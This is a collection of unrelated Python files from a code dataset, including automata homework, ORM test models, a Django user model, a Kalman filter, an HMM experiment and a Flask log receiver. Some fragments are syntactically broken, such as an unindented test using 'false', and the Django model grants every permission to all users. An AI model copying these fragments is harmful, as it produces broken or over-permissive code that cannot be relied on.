        state, symbol = sequences_found_so_far[state]
        digits.append(str(symbol))
        remaining -= 1
    return ''.join(reversed(digits))
def createArray2(alphabet, n):
    """Like createArray, but cells are bare ints instead of singleton
    lists -- i.e. a plain deterministic transition table."""
    rows = []
    for remainder in range(n):
        rows.append([(remainder * 10 + letter) % n for letter in alphabet])
    return rows
def testConvertDFAEquivalence(nfa, accepting_states):
    """Determinism check: converting the same NFA twice must produce DFAs
    with identical key order and identical rows; prints a success message
    or exits on mismatch."""
    quitloop = False
    for i in range(1):
        b, f = convertNFAToDFA(nfa, accepting_states)
        c, d = convertNFAToDFA(nfa, accepting_states)
        for key_1, key_2 in zip(b.keys(), c.keys()):
            #print(key_1, " ", key_2)
            if key_1 != key_2:
                print(key_1, " ", key_2, " SHOULD BE THE SAME")
                quitloop = True
            else:
                # same key: compare the rows element-wise as well
                for i, next_state in enumerate(b[key_1]):
                    if next_state != c[key_2][i]:
                        print("THIS IS WRONG, next state should equal c[key_2][i]")
    if quitloop:
        exit()
    print("all keys were the same in the converted DFA's")
def testConvertToProperllyConvertedDFA(dfa1, dfa2):
quitloop = false
for i, row in enumerate(dfa1):
for j, col in enumerate(row):
if col != dfa2[i][j]:
print("our col in dfa1 did not equal dfa2, somethings wrong!")
quitloop = true
if quitloop:
exit()
print("Convert to properlly converted dfa worked!")
def convertTest(B, F):
    """Renumber the name-keyed DFA (B, F) to integer indices and return
    only the renumbered transition table.

    NOTE(review): ``new_accepting_states`` is computed but neither returned
    nor used -- confirm whether callers need it before removing.
    """
    converted_state_number = { number : i for i, number in enumerate(B.keys()) }
    properlyConvertedDFA, properlyConvertedAcceptingStates = convertToProperllyConvertedDFA(B, F, converted_state_number)
    # complement of the accepting set over all renumbered states
    new_accepting_states = set([i for i, row in enumerate(properlyConvertedDFA)]) - set(properlyConvertedAcceptingStates)
    return properlyConvertedDFA
def testExtraCredit(nfa, accepting_states, n, k):
    """Find and print the smallest len(str(n))-digit integer that is
    strongly NOT divisible by k, by determinizing the NFA, complementing
    its accepting set and BFS-ing for the shortest accepted input.

    NOTE(review): ``sequence == -1`` can never be true -- bfs() returns the
    string 'none' on failure, so the failure branch is dead; confirm and
    align the sentinel.  The throwaway makeDFAs()/createArray2() results and
    the 10-iteration outer loop look like leftover benchmarking scaffolding.
    """
    for i in range(10):
        dfa_1, dfa_2 = makeDFAs([i for i in range(10)], k)
        #nfa, accepting_states = makeNFA(dfa_1, dfa_2)
        B, F = convertNFAToDFA(nfa, accepting_states)
        converted_state_number = { number : i for i, number in enumerate(B.keys()) }
        properlyConvertedDFA, properlyConvertedAcceptingStates = convertToProperllyConvertedDFA(B, F, converted_state_number)
        # complement: accept exactly what the divisibility NFA rejected
        new_accepting_states = set([i for i, row in enumerate(properlyConvertedDFA)]) - set(properlyConvertedAcceptingStates)
        test_dfa = createArray2([i for i in range(1, 10)], k)
        #int(len(str(n)))
        # (reported issue: breaks when 17 is entered -- unresolved)
        sequence = bfs(properlyConvertedDFA, 0, [i for i in range(10)], new_accepting_states, len(str(n)))
        if sequence == -1:
            print("Could not find any integer with ", int(len(str(n))), " digits that is strongly not divisible by ", k,)
        else:
            print("The smallest integer with ", int(len(str(n))), " digits that is strongly not divisible by ", k, " is: ", sequence)
def main():
    """Interactive driver: read k and N, test strong non-divisibility of N
    by k, then run the extra-credit smallest-counterexample search."""
    if sys.version_info <= (3, 0):
        sys.exit('You need python 3.0>')
    k = int(input("Enter your k (at most 4 digits): "))
    if k > 9999:
        while k > 9999:
            k = int(input("Your k is more then 4 digits, try again: "))
    # build the skip-one-digit NFA for divisibility by k over digits 0-9
    dfa_1, dfa_2 = makeDFAs([i for i in range(10)], k)
    nfa, accepting_states = makeNFA(dfa_1, dfa_2)
    # debug dump of the NFA rows (comprehension used purely for side effect)
    [print(i) for i in nfa]
    n = input("Enter an integer N (up to 100 digits: ")
    # 60602458739593758801428753207988572826358825383144 mod 7, 7777 passes
    if stronglyNotDivisible(nfa, convertToList(n), accepting_states):
        print("yes ", n, " is strongly not divisible by ", k)
    else:
        print("no ", n, " is strongly not divisible by ", k)
    # (reported issue: fails once n exceeds 16 digits -- unresolved)
    k = int(input('for extra credit reenter k but 0 <= k <= 100\n'))
    n = int(input('for extra credit reenter n but 0 <= n <= 100 digits\n'))
    while k > 100 or len(str(n)) > 100:
        print('reenter k and n')
        k = int(input('for extra credit reenter k but 0 <= k <= 100\n'))
        n = int(input('for extra credit reenter n but 0 <= n <= 100 digits\n'))
    # fresh NFA for the (possibly different) extra-credit k
    dfa_3, dfa_4 = makeDFAs([i for i in range(10)], k)
    nfa_2, accepting_states_2 = makeNFA(dfa_3, dfa_4)
    testExtraCredit(nfa_2, accepting_states_2, n, k)
main()
| StarcoderdataPython |
11228504 | from flask_sqlalchemy_bundle import db
class OneBasic(db.Model):
    """Minimal lazy-mapped model with a single name column."""
    class Meta:
        # defer table/mapper creation until the bundle maps it explicitly
        lazy_mapped = True
    name = db.Column(db.String)
class OneParent(db.Model):
    """Parent side of a one-to-many relationship with OneChild."""
    class Meta:
        lazy_mapped = True
    # relationships = {'OneChild': 'children'}
    name = db.Column(db.String)
    # one-to-many: mirrors OneChild.parent
    children = db.relationship('OneChild', back_populates='parent')
class OneChild(db.Model):
    """Child side of the one-to-many relationship with OneParent."""
    class Meta:
        lazy_mapped = True
    # relationships = {'OneParent': 'parent'}
    name = db.Column(db.String)
    # FK column plus the object-level relationship it backs
    parent_id = db.foreign_key('OneParent')
    parent = db.relationship('OneParent', back_populates='children')
class OneUserRole(db.Model):
    """Join table between User and Role"""
    class Meta:
        lazy_mapped = True
        # composite primary key from the two FK columns below; no surrogate id
        pk = None
    # relationships = {'OneUser': 'user', 'OneRole': 'role'}
    user_id = db.foreign_key('OneUser', primary_key=True)
    user = db.relationship('OneUser', back_populates='user_roles')
    role_id = db.foreign_key('OneRole', primary_key=True)
    role = db.relationship('OneRole', back_populates='role_users')
    __repr_props__ = ('user_id', 'role_id')

    def __init__(self, user=None, role=None, **kwargs):
        """Allow construction from either side; used by the association
        proxies on OneUser.roles and OneRole.users."""
        super().__init__(**kwargs)
        if user:
            self.user = user
        if role:
            self.role = role
class OneUser(db.Model):
    """User with many-to-many roles via the OneUserRole join model."""
    class Meta:
        lazy_mapped = True
    # relationships = {'OneUserRole': 'user_roles'}
    name = db.Column(db.String)
    # join rows are owned by the user: deleting a user deletes its rows
    user_roles = db.relationship('OneUserRole', back_populates='user',
                                 cascade='all, delete-orphan')
    # convenience view: user.roles yields Role objects directly
    roles = db.association_proxy('user_roles', 'role',
                                 creator=lambda role: OneUserRole(role=role))
class OneRole(db.Model):
    """Role with many-to-many users via the OneUserRole join model."""
    class Meta:
        lazy_mapped = True
    # relationships = {'OneUserRole': 'role_users'}
    # role names are looked up by name, hence unique + indexed
    name = db.Column(db.String, unique=True, index=True)
    role_users = db.relationship('OneUserRole', back_populates='role',
                                 cascade='all, delete-orphan')
    # convenience view: role.users yields User objects directly
    users = db.association_proxy('role_users', 'user',
                                 creator=lambda user: OneUserRole(user=user))
    __repr_props__ = ('id', 'name')
| StarcoderdataPython |
9679998 | <filename>tests/test_snakefile.py
import subprocess
def test_snakefile_dryrun():
    """Dry-run the Snakefile to check that it parses and the DAG resolves."""
    cmd = ['snakemake', '-n', '-r']
    subprocess.run(cmd, check=True)
    assert True
def test_snakefile_full(setup_snakefile):
    """Run the full Snakemake workflow against the test MIC csv."""
    # Set the config MIC csv to use our test one
    mic_csv = 'tests/public_mic_class_dataframe_test.csv'
    # Pass an argv list instead of shell=True: no shell-injection surface
    # and no word-splitting surprises if the path ever contains spaces.
    subprocess.run(
        ['snakemake', '--config', 'graph_labels={}'.format(mic_csv)],
        check=True)
    assert True
def test_snakefile_full_pyinstrument(setup_snakefile):
    """Run the full workflow with pyinstrument profiling enabled."""
    # Set the config MIC csv to use our test one
    mic_csv = 'tests/public_mic_class_dataframe_test.csv'
    # Argv list instead of a shell string (see test_snakefile_full).
    subprocess.run(
        ['snakemake',
         '--config', 'graph_labels={}'.format(mic_csv),
         '--config', 'pyinstrument=True'],
        check=True)
    assert True
| StarcoderdataPython |
9671178 | <filename>core/models.py
from django.db import models
from django.contrib.auth.models import AbstractBaseUser,BaseUserManager
class UsuarioManager(BaseUserManager):
    """Manager for the custom RA-based user model."""
    # keep this custom manager available inside migrations
    use_in_migrations = True

    def _create_user(self, ra, password, **extra_fields):
        # shared implementation for regular users and superusers
        if not ra:
            raise ValueError('RA precisa ser preenchido')
        user = self.model(ra=ra, **extra_fields)
        user.set_password(password)
        user.save(using=self._db)
        return user

    def create_user(self, ra, password=None, **extra_fields):
        """Create a regular user identified by RA."""
        return self._create_user(ra, password, **extra_fields)

    def create_superuser(self, ra, password, **extra_fields):
        """Create a superuser.

        NOTE(review): no superuser/perfil flag is set here, so the result is
        indistinguishable from a regular user -- confirm this is intended.
        """
        return self._create_user(ra, password, **extra_fields)
return self._create_user(ra, password, **extra_fields)
class Usuario(AbstractBaseUser):
    """Custom user identified by RA (registro acadêmico) instead of a username."""
    nome = models.CharField(max_length=50)
    # RA is the login identifier, hence unique
    ra = models.IntegerField(unique=True)
    password = models.CharField(max_length=150)
    # single-letter profile/role code; defaults to 'C'
    perfil = models.CharField(max_length=1, default='C')
    ativo = models.BooleanField(default=True)
    USERNAME_FIELD = 'ra'
    REQUIRED_FIELDS = ['nome']
    objects = UsuarioManager()

    @property
    def is_staff(self):
        # NOTE(review): perfil defaults to 'C', so every new user counts as
        # staff by default -- confirm this is intended.
        return self.perfil == 'C'

    def has_perm(self, perm, obj=None):
        # permissive: every permission is granted
        return True

    def has_module_perms(self, app_label):
        # permissive: access to every app's admin module
        return True

    def get_short_name(self):
        return self.nome

    def get_full_name(self):
        return self.nome

    def __unicode__(self):
        # Python 2-style representation (pre-Django-2 codebase)
        return self.nome
class Curso(models.Model):
sigla = models.CharField(max_length=10)
nome = models.CharField(max_length=200)
tipo = models.CharField(max_length=50,blank=True)
carga_horaria = models.IntegerField(default=1000)
ativo = models.BooleanField(default=True)
descricao = models.TextField(blank=True)
Matriz_Curricular = models.TextField(blank=True)
def __unicode__(self):
return self.nome
class Aluno(Usuario):
    """Student: a Usuario enrolled in a Curso (multi-table inheritance)."""
    curso = models.ForeignKey(
        Curso
    )
# Create your models here.
| StarcoderdataPython |
12837400 | <filename>UnityPy/Logger.py<gh_stars>0
import logging
import sys
from termcolor import colored
# Windows terminals need colorama to translate ANSI escape codes.
if sys.platform == 'win32':
    from colorama import init
    init()

# Log level name -> termcolor color; levels not listed stay uncolored.
COLORS = {
    'DEBUG': 'green',
    'INFO': 'yellow',
    'WARNING': 'magenta',
    'ERROR': 'red',
}
class ListHandler(logging.Handler):
    """Logging handler that buffers every emitted record in a list,
    so tests (or callers) can inspect what was logged."""

    def __init__(self):
        super().__init__()
        # records captured so far, in emission order
        self.logs = []

    def emit(self, record):
        """Store the raw LogRecord instead of writing it anywhere."""
        self.logs.append(record)
class ColoredFormatter(logging.Formatter):
    """Formatter that wraps the formatted message in an ANSI color
    according to the record's level (see the COLORS mapping)."""

    def format(self, record):
        text = super().format(record)
        color = COLORS.get(record.levelname)
        if color is not None:
            text = colored(text, color)
        return text
| StarcoderdataPython |
3561577 | """
Generate a dataset with the following properties
- Binary classification
- Static features which are ~0.7 separable using RF
- Dynamic features which are ~0.7 separable using generative-model-based classifier
- Some of the instances must be predicatable only from the static features, other only from
the sequence data, other from both, and some are not reasonably predictable at all
"""
import numpy as np
from sklearn.ensemble import RandomForestClassifier
from HMM.hmm_classifier import HMMClassifier
#
# Load the dataset
#
print 'Loading the dataset..'
static_train = np.load('/storage/hpc_anna/GMiC/Data/syn_arma_diff/train_static.npy')
dynamic_train = np.load('/storage/hpc_anna/GMiC/Data/syn_arma_diff/train_dynamic.npy')
static_val = np.load('/storage/hpc_anna/GMiC/Data/syn_arma_diff/test_static.npy')
dynamic_val = np.load('/storage/hpc_anna/GMiC/Data/syn_arma_diff/test_dynamic.npy')
labels_train = np.load('/storage/hpc_anna/GMiC/Data/syn_arma_diff/train_labels.npy')
labels_val = np.load('/storage/hpc_anna/GMiC/Data/syn_arma_diff/test_labels.npy')
#
# Sanity Checks
#
print "Expected performance of a lonely model is 0.75, of the joint model 1.0"
# a) static data classification
rf = RandomForestClassifier(n_estimators=100)
rf.fit(static_train, labels_train)
print "Random Forest with static features on validation set: %.4f" % rf.score(static_val, labels_val)
# b) dynamic data classification
hmmcl = HMMClassifier()
model_pos, model_neg = hmmcl.train(3, 10, dynamic_train, labels_train)
print "HMM with dynamic features on validation set: %.4f" % hmmcl.test(model_pos, model_neg, dynamic_val, labels_val)
"""
print "\nInital probabilities:"
print model_pos.startprob_
print model_neg.startprob_
print "\nTransition matrices:"
print model_pos.transmat_
print model_neg.transmat_
print "\nState means:"
print model_pos.means_
print model_neg.means_
print "\nState covariation matrices:"
print model_pos.covars_
print model_neg.covars_
"""
#
# Try to classify dynamic data with a discriminative model
#
dynamic_as_static_train = dynamic_train.reshape((dynamic_train.shape[0], dynamic_train.shape[1] * dynamic_train.shape[2]))
dynamic_as_static_val = dynamic_val.reshape((dynamic_val.shape[0], dynamic_val.shape[1] * dynamic_val.shape[2]))
print "Training RF on the dynamic dataset..."
rf = RandomForestClassifier(n_estimators=100)
rf.fit(dynamic_as_static_train, labels_train)
print "RF with dynamic features on validation set: %.4f" % rf.score(dynamic_as_static_val, labels_val)
#
# Evaluating Joint Model
#
print "Evaluating joint model:"
# Split the training set in half: one half trains the HMMs, the other half
# trains the RF on HMM-derived features (avoids leaking HMM training data).
print "Splitting data in two halves..."
fh_idx = np.random.choice(range(0, dynamic_train.shape[0]), size=np.round(dynamic_train.shape[0] * 0.5, 0), replace=False)
sh_idx = list(set(range(0, dynamic_train.shape[0])) - set(fh_idx))
fh_data = dynamic_train[fh_idx, :, :]
fh_labels = labels_train[fh_idx]
sh_data = dynamic_train[sh_idx, :, :]
sh_labels = labels_train[sh_idx]
# Fit one generative HMM per class on the first half of the sequences.
print "Training HMM classifier..."
hmmcl = HMMClassifier()
model_pos, model_neg = hmmcl.train(3, 10, fh_data, fh_labels)
# Per-instance positive/negative log-likelihood ratios become one extra feature.
print "Extracting ratios based on the HMM model..."
sh_ratios = hmmcl.pos_neg_ratios(model_pos, model_neg, sh_data)
val_ratios = hmmcl.pos_neg_ratios(model_pos, model_neg, dynamic_val)
# Append the HMM ratio column to the static feature matrix.
print "Merging static features and HMM-based ratios..."
enriched_sh_data = np.hstack((static_train[sh_idx, :], sh_ratios.reshape(len(sh_ratios), 1)))
enriched_val_data = np.hstack((static_val, val_ratios.reshape(len(val_ratios), 1)))
# Train the discriminative model on the enriched features and report accuracy.
print "Training RF on the merged dataset..."
rf = RandomForestClassifier(n_estimators=100)
rf.fit(enriched_sh_data, sh_labels)
print "RF+HMM with enriched features on validation set: %.4f" % rf.score(enriched_val_data, labels_val)
| StarcoderdataPython |
3220962 | from numpy import dot, sum, tile, exp, log, pi, shape, reshape
from numpy.linalg import inv, pinv, LinAlgError, det
import logging
logger = logging.getLogger("KalmanFilter")
# X: state vector at k-1
# P: covariance matrix at k-1
# A: state transition matrix
# Q: process noise covariance matrix
# B: input effect matrix
# U: control input vector
def kf_predict(x, P, A, Q, B, u):
    """Kalman filter time-update (prediction) step.

    Propagates state x and covariance P one step:
    x' = A·x + B·u,  P' = A·P·Aᵀ + Q, and returns (x', P').
    """
    shape_before = shape(x)
    logger.debug("A: %s", A)
    logger.debug("B: %s", B)
    logger.debug("x: %s", x)
    logger.debug("u: %s", u)
    logger.debug("shape A: %s", A.shape)
    logger.debug("shape B: %s", B.shape)
    logger.debug("shape x: %s", x.shape)
    logger.debug("shape u: %s", u.shape)
    # Dimensional sanity checks: u must match B's columns, B's rows match A's columns.
    assert shape(u)[0] == B.shape[1]
    assert A.shape[1] == B.shape[0]
    state_part = dot(A, x)
    # Force the control contribution into the same shape as A·x before adding.
    control_part = reshape(dot(B, u), shape(state_part))
    logger.debug("dot(A, x): %s", state_part)
    logger.debug("dot(B, u): %s", control_part)
    x = state_part + control_part
    logger.debug("x: %s", x)
    P = dot(A, dot(P, A.T)) + Q
    # If the state shape changed, the matrix dimensions are probably wrong.
    assert shape(x) == shape_before
    return x, P
# X: state vector at k-1
# P: covariance matrix at k-1
# Y: measurement vector
# H: measurement prediction matrix
# R: measurement noise covariance matrix
def kf_update(X, P, Y, H, R):
    """Kalman filter measurement-update step.

    Fuses measurement Y into state X / covariance P using measurement
    matrix H and measurement noise R. Returns (X, P, K, IM, IS) where
    K is the Kalman gain, IM the predicted measurement mean and IS the
    innovation covariance.
    """
    IM = dot(H, X)                      # mean of predictive distribution of Y
    IS = R + dot(H, dot(P, H.T))        # covariance of predicted measurement
    try:
        # Kalman gain via pseudo-inverse of the innovation covariance.
        K = dot(P, dot(H.T, pinv(IS)))
    except LinAlgError:
        logger.error("LinAlgError on IS inversion (Kalman Gain)")
        logger.error(IS)
        raise
    innovation = Y - IM
    X = X + dot(K, innovation)
    P = P - dot(K, dot(IS, K.T))
    return X, P, K, IM, IS
def gauss_pdf(X, M, S):
    """Multivariate Gaussian likelihood of X under mean M and covariance S.

    Returns (P[0], E[0]) where E is the negative log-likelihood and
    P = exp(-E). Broadcasts a single mean over many samples (or vice versa)
    via the first two branches.

    Bug fix: ``shape`` is an ndarray *attribute*, not a method — the original
    called ``M.shape()`` / ``X.shape()``, which raises TypeError on every path.
    """
    if M.shape[1] == 1:
        # One mean, possibly many sample columns in X.
        DX = X - tile(M, X.shape[1])
        E = 0.5 * sum(DX * (dot(inv(S), DX)), axis=0)
        E = E + 0.5 * M.shape[0] * log(2 * pi) + 0.5 * log(det(S))
        P = exp(-E)
    elif X.shape[1] == 1:
        # One sample, possibly many mean columns in M.
        DX = tile(X, M.shape[1]) - M
        E = 0.5 * sum(DX * (dot(inv(S), DX)), axis=0)
        E = E + 0.5 * M.shape[0] * log(2 * pi) + 0.5 * log(det(S))
        P = exp(-E)
    else:
        # Matching shapes: single quadratic form.
        DX = X - M
        E = 0.5 * dot(DX.T, dot(inv(S), DX))
        E = E + 0.5 * M.shape[0] * log(2 * pi) + .5 * log(det(S))
        P = exp(-E)
    return (P[0], E[0])
class KalmanFilter:
    """Stateful wrapper around kf_predict / kf_update.

    Holds the current state estimate and covariance and threads them
    through the functional predict/update steps defined above.
    """
    # X: state vector at k-1
    # P: covariance matrix at k-1
    # A: state transition matrix (function for dt)
    # Q: process noise covariance matrix
    # B: control influence (function for dt)
    # H: measurement prediction matrix
    def __init__(self, x, P, A, Q, B, H):
        # A and B are callables of dt (see predictWithInput); Q is scaled by dt.
        self.x = x
        self.P = P
        self.A = A
        self.Q = Q
        self.B = B
        self.H = H
    # U: control input vector
    def predictWithInput(self, U, dt):
        # Time update over a step of dt with control input U.
        (self.x, self.P) = kf_predict(self.x, self.P, self.A(dt), dt * self.Q, self.B(dt), U)
        return self.x, self.P
    # Y: measurement vector
    # R: measurement noise covariance matrix
    def updateWithMeasurement(self, Y, R):
        # Measurement update; gain/innovation terms (K, IM, IS) are discarded.
        (self.x, self.P, K, IM, IS) = kf_update(self.x, self.P, Y, self.H, R)
        return self.x, self.P
| StarcoderdataPython |
190600 | <reponame>Valentin-Aslanyan/ASOT
# Location and name of the magnetic-field dump to read.
file_directory="./"
bfield_file="bfield.0057883"
import sys
# Make the ASOT helper package importable; edit this path for your checkout.
sys.path[:0]=['/Change/This/Path']
from ASOT_Functions_Python import *
# Unpack grid coordinates and field data from the bfield file.
time,ntblks,nlblks,coord_logR,coord_theta,coord_phi,B=read_bfield_file(file_directory,bfield_file)
| StarcoderdataPython |
8110189 | <gh_stars>0
import threading
from receiver import Receiver
import socketserver
import datetime
import socket
from flask import Flask, render_template
from flask_socketio import SocketIO
# async_mode=None lets Flask-SocketIO pick the best available async backend.
async_mode = None
# TCP port the log Receiver listens on.
receiver_port = 9090
app = Flask(__name__)
app.config['SECRET_KEY'] = 'secret!'
socketio = SocketIO(app, async_mode=async_mode)
def receiver_task():
    """Run a blocking TCP server that relays received messages to Socket.IO clients."""
    class EmitReceiver(Receiver):
        def notify(self, message: dict):
            # Tag the message with sender address and receive time, stringify
            # every value, then push it to subscribers on the '/log' namespace.
            message['address'] = self.request.getpeername()
            message['time'] = datetime.datetime.now()
            for k in message.keys():
                message[k] = str(message[k])
            print('EMIT', message)
            socketio.emit('event', message, namespace='/log')
    server = socketserver.ThreadingTCPServer(('', receiver_port), EmitReceiver)
    # Allow quick restarts without waiting for TIME_WAIT to clear.
    server.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    server.serve_forever()
@app.route("/")
def index():
    """Serve the single-page log viewer."""
    return render_template('index.html')
if __name__ == '__main__':
    # Run the receiver in a background thread, then start the web app.
    # receiver_task()
    th = threading.Thread(target=receiver_task)
    th.start()
    socketio.run(app, debug=False, host='0.0.0.0', port=5050)
| StarcoderdataPython |
6503974 | # encoding: utf-8
"""Provides Python 2 compatibility objects."""
from StringIO import StringIO as BytesIO # noqa
def is_integer(obj):
    """Return True if *obj* is an integer (int, long), False otherwise."""
    # `long` is the Python 2 arbitrary-precision integer type.
    return isinstance(obj, (int, long))
def is_string(obj):
    """Return True if *obj* is a string, False otherwise."""
    # `basestring` is the common Python 2 ancestor of str and unicode.
    return isinstance(obj, basestring)
def is_unicode(obj):
    """Return True if *obj* is a unicode string, False otherwise."""
    return isinstance(obj, unicode)
def to_unicode(text):
    """Return *text* as a unicode string.
    *text* can be a 7-bit ASCII string, a UTF-8 encoded 8-bit string, or unicode. String
    values are converted to unicode assuming UTF-8 encoding. Unicode values are returned
    unchanged.
    """
    # both str and unicode inherit from basestring
    if not isinstance(text, basestring):
        tmpl = "expected unicode or UTF-8 (or ASCII) encoded str, got %s value %s"
        raise TypeError(tmpl % (type(text), text))
    # return unicode strings unchanged
    if isinstance(text, unicode):
        return text
    # otherwise assume UTF-8 encoding, which also works for ASCII
    return unicode(text, "utf-8")
# Alias so callers can spell the Python 2 text type uniformly.
Unicode = unicode
| StarcoderdataPython |
3591085 | import psycopg2
class Postgres(object):
    """Minimal psycopg2 connection holder.

    Opens a connection on construction and exposes it as ``pg_conn``
    together with a single cursor ``pg_cur``. No close/cleanup is provided —
    the connection lives for the lifetime of the object.
    """
    def __init__(self, server, port, database, username, password):
        # psycopg2 keyword arguments for the DSN.
        dbconn = {'database': database,
                  'user': username,
                  'password': password,
                  'host': server,
                  'port': port}
        self.pg_conn = psycopg2.connect(**dbconn)
        self.pg_cur = self.pg_conn.cursor()
| StarcoderdataPython |
272073 | from lona.html import Strong, Button, CLICK, HTML, Div, H1
from lona import LonaView, LonaApp
from lona_chartjs import Chart
app = LonaApp(__file__)
# Minimal page styling served as a static file.
app.add_static_file('lona/style.css', """
body{
    font-family: sans-serif;
}
""")
@app.route('/')
class ChartjsClickAnalyzerView(LonaView):
    def handle_request(self, request):
        """Interactive demo: record 10 clicks, then chart their x/y positions.

        Runs an endless loop per connection: show the click area, collect ten
        click coordinates, render them as a Chart.js line chart, and wait for
        a click on the chart screen before starting over.
        """
        # Static page skeleton: a click panel and an (initially empty) chart panel.
        html = HTML(
            H1('Chart.js Click Analyzer'),
            Div(
                _id='click',
                nodes=[
                    Div('Click the click area'),
                    Div(Strong(_id='click-counter'), ' clicks to go'),
                    Div(
                        _id='click-area',
                        _style={
                            'width': '500px',
                            'height': '300px',
                            'background-color': 'lightgrey',
                        },
                        events=[CLICK],
                    ),
                ],
            ),
            Div(_id='chart'),
        )
        click_div = html.query_selector('#click')
        click_counter = html.query_selector('#click-counter')
        click_area = html.query_selector('#click-area')
        chart_div = html.query_selector('#chart')
        while True:
            # show click area
            click_div.show()
            chart_div.hide()
            # record clicks
            x_positions = []
            y_positions = []
            for i in range(10, 0, -1):
                # Countdown display, then block until the next click arrives.
                click_counter.set_text(str(i))
                self.show(html)
                input_event = self.await_click(click_area)
                x_positions.append(input_event.data['x'])
                y_positions.append(input_event.data['y'])
            # render chart
            chart = Chart({
                'type': 'line',
                'data': {
                    'labels': [str(i) for i in range(1, 11)],
                    'datasets': [
                        {
                            'label': 'X Position',
                            'data': x_positions,
                            'backgroundColor': 'red',
                            'borderColor': 'red',
                        },
                        {
                            'label': 'Y Position',
                            'data': y_positions,
                            'backgroundColor': 'blue',
                            'borderColor': 'blue',
                        },
                    ],
                },
                'options': {
                    'responsive': False,
                    'scales': {
                        'y': {
                            'beginAtZero': True,
                        },
                    },
                },
            })
            chart.width = '500px'
            chart.height = '300px'
            chart_div.nodes.clear()
            chart_div.nodes.append(Button('Reset'))
            chart_div.nodes.append(chart)
            # show chart
            click_div.hide()
            chart_div.show()
            self.show(html)
            # Any click (e.g. the Reset button) restarts the loop.
            self.await_click()
app.run()
| StarcoderdataPython |
9649031 | # waht we need: policy and state transition matrix
# combine those two into one ditcionary and read it out into a textfile
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import time
from collections import Counter
from PlotCircles import circles
import multiprocessing
import itertools
import os
import random
from operator import itemgetter
from math import *
# set the current working directory
def chunks(l, n):
    """Yield successive pieces of *l* of size *n*.

    With n == 0 the whole input is yielded unchanged. Plain lists are
    sliced positionally; anything else is assumed to be a pandas object
    and sliced with label-based (end-inclusive) ``.loc``.
    """
    if n == 0:
        yield l
        return
    for start in range(0, len(l), n):
        stop = start + n
        if isinstance(l, list):
            yield l[start:stop]
        else:
            # pandas .loc is end-inclusive, hence stop - 1.
            yield l.loc[start:stop - 1].reset_index(drop=True)
def convertValues(valueArr, old_max, old_min, new_max, new_min):
    """Linearly rescale each value from [old_min, old_max] into [new_min, new_max]."""
    old_span = float(old_max - old_min)
    new_span = new_max - new_min
    return [((value - old_min) / old_span) * new_span + new_min for value in valueArr]
def area_calc(probs, r):
    """Scale radius *r* by the square root of each probability (area-true sizing)."""
    scaled = []
    for prob in probs:
        scaled.append(np.sqrt(float(prob)) * r)
    return scaled
def duplicates(n):
    """Map each value occurring more than once in *n* to the list of its indices."""
    counts = Counter(n)
    return {
        value: [idx for idx, item in enumerate(n) if item == value]
        for value, count in counts.items()
        if count != 1
    }
# hepler function for plotting the lines
def isReachable(currentIdent, nextIdentList):
    """Indices of entries in *nextIdentList* containing a child ident of *currentIdent*.

    Children in the binary identifier tree are 2*i and 2*i + 1.
    Returned order follows set iteration (de-duplicated, not guaranteed sorted).
    """
    left_child = currentIdent * 2
    right_child = left_child + 1
    hits = {
        idx
        for idx, idents in enumerate(nextIdentList)
        if left_child in idents or right_child in idents
    }
    return list(hits)
def joinIndidividualResultFiles(argument, tValues, dataPath):
    """Concatenate per-time-step CSV outputs into a single 'final*' CSV.

    argument selects the source layout: 'raw' (per-batch files in a folder per
    time step), 'aggregated' or 'plotting' (one file per time step).
    NOTE: Python 2 source (print statements). Writes into the current
    working directory.
    """
    # need to provide the dataPath accordingly
    if argument == 'raw':
        resultsDFAll =[]
        for t in tValues:
            print 'Currently aggregating data for time step %s' % t
            # batch level
            resultDFList = [batchPstar for batchPstar in os.listdir(os.path.join(dataPath, '%s' % t))]
            # Sort batches numerically by their file-name stem.
            resultDFListSorted = [batchPstar for batchPstar in
                                  sorted(resultDFList, key=lambda x: int(x.replace('.csv', '')))]
            # read and concatenate all csv file for one time step
            resultsDF = pd.concat(
                [pd.read_csv(os.path.join(dataPath, os.path.join('%s' % t, f)),index_col=0).reset_index(drop = True) for f in resultDFListSorted]).reset_index(drop = True)
            resultsDFAll.append(resultsDF)
        finalData = pd.concat(resultsDFAll).reset_index(drop = True)
        finalData.to_csv('finalRaw.csv')
    elif argument == "aggregated":
        resultsDF = pd.concat(
            [pd.read_csv(os.path.join(dataPath, 'aggregatedResults_%s.csv' % t), index_col=0) for t in
             tValues]).reset_index(drop=True)
        resultsDF.to_csv('finalAggregated.csv')
    elif argument == 'plotting':
        resultsDF = pd.concat(
            [pd.read_csv(os.path.join(dataPath, 'plottingResults_%s.csv' % t), index_col=0) for t in
             tValues]).reset_index(drop=True)
        resultsDF.to_csv('finalPlotting.csv')
    else:
        print "Wrong argument"
# function for parallelization
def plotLinesCopy(subDF1Identifiers, nextIdentList):
    """For each identifier group, collect sorted, de-duplicated reachable index lists.

    Returns [] when *subDF1Identifiers* is empty/falsy.
    """
    collected = []
    if not subDF1Identifiers:
        return collected
    for identGroup in subDF1Identifiers:  # as many lines as unique cue validities
        reachable = [isReachable(ident, nextIdentList) for ident in identGroup]
        reachable.sort()
        # groupby on the sorted list removes all duplicates.
        collected.append([group for group, _ in itertools.groupby(reachable)])
    return collected
def plotLines(identSubDF1, nextIdentList):
    """Reachable index lists for one identifier group, sorted and de-duplicated."""
    reachable = [isReachable(ident, nextIdentList) for ident in identSubDF1]
    reachable.sort()
    # groupby on the sorted list removes all duplicates.
    return [group for group, _ in itertools.groupby(reachable)]
def func_star(allArgs):
    # Shim for multiprocessing.Pool.map, which passes a single argument:
    # unpack the (chunk, nextIdentList) tuple into plotLines' two parameters.
    return plotLines(*allArgs)
def cleanIdentifiers(oldIdentifiers):
    """Parse stringified float lists like '[1.0, 2.0]' back into lists of ints."""
    cleaned = []
    for ident in oldIdentifiers:
        tokens = str(ident).replace('[', '').replace(']', '').split(',')
        # Strip the '.0' suffix so e.g. ' 2.0' parses as the int 2.
        cleaned.append([int(str(token).replace('.0', '')) for token in tokens])
    return cleaned
def policyPlotReduced(T,r,pE0Arr, pC0E0Arr, tValues, dataPath, lines, argumentR, argumentP, minProb,mainPath, plottingPath):
    """Plot developmental trajectories over the prior x cue-validity grid.

    One subplot per (cue validity, prior) combination: circles sized by state
    probability, optional connecting lines between consecutive time steps
    (``lines`` flag), and pie markers where identical estimates lead to
    different decisions. Saves 'DevelopmentalTrajectoryReduced.png' under
